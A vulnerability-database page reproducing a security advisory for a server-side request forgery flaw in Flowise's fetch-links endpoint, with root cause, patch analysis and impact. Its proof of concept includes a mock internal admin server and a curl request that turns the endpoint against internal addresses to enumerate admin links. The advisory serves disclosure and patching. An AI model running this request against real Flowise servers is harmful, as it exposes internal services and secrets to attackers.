7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-hr92-4q35-4j3m

EPSS Score

CWE

CWE-918

Published

9/15/2025

Updated

9/15/2025

KEV Status

Technology

JavaScript

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-hr92-4q35-4j3m

GHSA-hr92-4q35-4j3m: FlowiseAI/Flowise has Server-Side Request Forgery (SSRF) vulnerability

Summary

A Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/v1/fetch-links endpoint of the Flowise application. This vulnerability allows an attacker to use the Flowise server as a proxy to access internal network web services and explore their link structures. The impact includes the potential exposure of sensitive internal administrative endpoints.

Details

Vulnerability Overview

The fetch-links feature in Flowise is designed to extract links from external websites or XML sitemaps. It performs an HTTP request from the server to the user-supplied URL and parses the response (HTML or XML) to extract and return links.

The issue arises because the feature performs these HTTP requests without validating the user-supplied URL. In particular, when the relativeLinksMethod parameter is set to webCrawl or xmlScrape, the server directly calls the fetch() function with the provided URL, making it vulnerable to SSRF attacks.

Root Cause

The fetch() function is called without URL validation or restriction, which enables attackers to redirect the server to internal services.

Taint Flow

• Taint 01: Route Registration

https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24

• Taint 02: Service

https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18

• Taint 03: xmlScrape

https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478

PoC

PoC Description

This vulnerability was verified in a local development environment. The Flowise server was running at http://localhost:3000, and authentication was performed using the Bearer token:

tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q

Upon a successful attack, the Flowise server returned the entire link structure of the internal admin panel in JSON format. The response included sensitive administrative URLs such as:

/api/users (User Management)
/api/secrets (API Keys)
/api/database (Database Config)

This demonstrated that an attacker could enumerate internal web service structures.

Internal Admin Server (Mock)

from flask import Flask, render_template_string

app = Flask(__name__)

@app.route('/')
def admin():
    return render_template_string("""
    <html>
    <h1>Internal Admin Panel</h1>
    <ul>
        <li><a href="/api/users">User Management</a></li>
        <li><a href="/api/secrets">API Keys</a></li>
        <li><a href="/api/database">Database Config</a></li>
        <li><a href="/api/logs">System Logs</a></li>
    </ul>
    """)

@app.route('/api/users')
def users():
    return render_template_string("""
    <html>
    <h1>Users</h1>
    <ul>
        <li><a href="/api/users/admin">admin (root)</a></li>
        <li><a href="/api/users/operator">operator</a></li>
    </ul>
    <a href="/">Back</a>
    """)

@app.route('/api/secrets')
def secrets():
    return render_template_string("""
    <html>
    <h1>Secrets</h1>
    <ul>
        <li><a href="/api/secrets/db_key">DB Key: sk-1234567890abcdef</a></li>
        <li><a href="/api/secrets/aws_key">AWS Key: AKIAIOSFODNN7EXAMPLE</a></li>
    </ul>
    <a href="/">Back</a>
    """)

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8080)

curl Request Example

curl -G 'http://localhost:3000/api/v1/fetch-links' \
     --data-urlencode 'url=http://127.0.0.1:8080/' \
     --data-urlencode 'relativeLinksMethod=webCrawl' \
     --data-urlencode 'limit=10' \
     -H 'Authorization: Bearer tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q' \
     -s | jq '.'

Impact

This is a Server-Side Request Forgery (SSRF) vulnerability.

Who is impacted? Any user running Flowise server exposed to external traffic.
Risk: Attackers can leverage the Flowise server to:
- Explore internal web applications
- Bypass firewall rules
- Access sensitive administrative interfaces
- Leak internal configuration, credentials, or secrets

This vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in an enterprise environment.

(GitHub Advisory)

Miggo Vulnerability Database

→

GHSA-hr92-4q35-4j3m

GHSA-hr92-4q35-4j3m:

7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-hr92-4q35-4j3m

EPSS Score

CWE

CWE-918

Published

9/15/2025

Updated

9/15/2025

KEV Status

Technology

JavaScript

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
flowise	npm	= 3.0.5	3.0.6

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability analysis identified a Server-Side Request Forgery (SSRF) issue in the /api/v1/fetch-links endpoint of the Flowise application. The root cause was the lack of URL validation when the server-side fetch API was used to retrieve content from user-provided URLs.

The investigation started by analyzing the provided vulnerability details, which pointed to specific code paths in the FlowiseAI/Flowise repository. By comparing the last vulnerable version (3.0.5) with the first patched version (3.0.6), I identified the fixing commit e002e617df6177cb603c8c569d224bce5fb96b33.

The commit's patch introduced two new security functions, secureFetch and checkDenyList, and applied them to the vulnerable code paths.

The analysis of the patch revealed three key functions involved in the vulnerability:

xmlScrape (packages/components/src/utils.ts): This function's direct use of fetch(currentURL) was replaced with secureFetch(currentURL), confirming it as a sink for the SSRF.
webCrawl (packages/components/src/utils.ts): This function, and the crawl helper it calls, also used an unrestricted fetch. The patch added a checkDenyList validation at the start of webCrawl and replaced fetch with secureFetch within the crawl function, indicating it was a primary vulnerable path.
getAllLinks (packages/server/src/services/fetch-links/index.ts): This service-layer function acts as the entry point for the vulnerable logic, taking the user's URL and dispatching it to either webCrawl or xmlScrape. The patch added a checkDenyList call here as a defense-in-depth measure.

These three functions would appear in a runtime profile or stack trace during an exploit. An attacker would send a request to the /api/v1/fetch-links endpoint, which would trigger the getAllLinks service, and subsequently either webCrawl or xmlScrape, causing the server to make a malicious request to an internal resource.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

7.5

-

Basic Information

Basic Information

Concerned about an active attack path?

GHSA-hr92-4q35-4j3m: FlowiseAI/Flowise has Server-Side Request Forgery (SSRF) vulnerability

Summary

Details

Vulnerability Overview

Root Cause

Taint Flow

• Taint 01: Route Registration

• Taint 02: Service

• Taint 03: xmlScrape

PoC

PoC Description

Internal Admin Server (Mock)

curl Request Example

Impact

GHSA-hr92-4q35-4j3m:

7.5

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

Technical Details

7.5

7.5

GHSA-hr92-4q35-4j3m: FlowiseAI/Flowise has Server-Side Request Forgery (SSRF) vulnerability

Summary

Details

Vulnerability Overview

Root Cause

Taint Flow

• Taint 01: Route Registration

• Taint 02: Service

• Taint 03: xmlScrape

PoC

PoC Description

Internal Admin Server (Mock)

curl Request Example

Impact

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI